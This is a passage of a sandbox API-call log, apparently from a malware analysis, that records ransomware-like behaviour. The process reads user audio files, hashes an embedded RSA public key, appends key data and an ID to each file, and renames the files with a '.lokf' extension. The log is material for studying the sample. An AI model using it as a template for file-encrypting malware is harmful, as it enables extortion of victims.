dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.974] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.974] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xa958, lpOverlapped=0x0) returned 1 [0060.975] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.975] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.975] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.975] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.976] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.976] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.976] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.976] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.976] GetLastError () returned 0x0 [0060.976] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.976] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.976] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.976] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.976] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa960) returned 0x9c8dae8 [0060.976] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c869b0 [0060.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86118 [0060.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c869f8 [0060.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86130 [0060.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86160 [0060.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86178 [0060.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.977] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86160 | out: hHeap=0x660000) returned 1 [0060.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86178 | out: hHeap=0x660000) returned 1 [0060.977] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa958, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.977] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.978] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.978] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.978] CloseHandle (hObject=0x5cc) returned 1 [0060.979] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290508 [0060.979] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.979] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\jDMSBY8z.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\uljqyypz2ie5azrk\\jdmsby8z.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\jDMSBY8z.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\uljqyypz2ie5azrk\\jdmsby8z.wav.lokf")) returned 1 [0060.980] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a1f700, ftCreationTime.dwHighDateTime=0x1d4d008, ftLastAccessTime.dwLowDateTime=0x87bbd310, ftLastAccessTime.dwHighDateTime=0x1d4c70e, ftLastWriteTime.dwLowDateTime=0x87bbd310, ftLastWriteTime.dwHighDateTime=0x1d4c70e, nFileSizeHigh=0x0, nFileSizeLow=0xde60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OcnaPENNojmBU3Ny_1f.mp3", cAlternateFileName="OCNAPE~1.MP3")) returned 1 [0060.980] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.980] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.980] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\OcnaPENNojmBU3Ny_1f.mp3") returned=".mp3" [0060.980] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\OcnaPENNojmBU3Ny_1f.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\uljqyypz2ie5azrk\\ocnapennojmbu3ny_1f.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.980] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=56928) returned 1 [0060.980] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.983] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xde3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.983] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.984] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.984] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xde60, lpOverlapped=0x0) returned 1 [0060.984] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.984] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.984] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.984] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.984] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.985] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.985] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.985] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.985] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.985] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.985] GetLastError () returned 0x0 [0060.985] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.985] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.985] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.985] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.985] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.985] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.986] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.986] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xde60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.986] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.986] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.986] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.986] CloseHandle (hObject=0x5cc) returned 1 [0060.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd0) returned 0x31e9450 [0060.987] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8d0) returned 0x3268798 [0060.988] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\OcnaPENNojmBU3Ny_1f.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\uljqyypz2ie5azrk\\ocnapennojmbu3ny_1f.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\OcnaPENNojmBU3Ny_1f.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\uljqyypz2ie5azrk\\ocnapennojmbu3ny_1f.mp3.lokf")) returned 1 [0060.989] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a1f700, ftCreationTime.dwHighDateTime=0x1d4d008, ftLastAccessTime.dwLowDateTime=0x87bbd310, ftLastAccessTime.dwHighDateTime=0x1d4c70e, ftLastWriteTime.dwLowDateTime=0x87bbd310, ftLastWriteTime.dwHighDateTime=0x1d4c70e, nFileSizeHigh=0x0, nFileSizeLow=0xde60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OcnaPENNojmBU3Ny_1f.mp3", cAlternateFileName="OCNAPE~1.MP3")) returned 0 [0060.989] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262c78 | out: hHeap=0x660000) returned 1 [0060.989] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adbb0 [0060.989] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.991] RtlAllocateHeap (HeapHandle=0x660000, 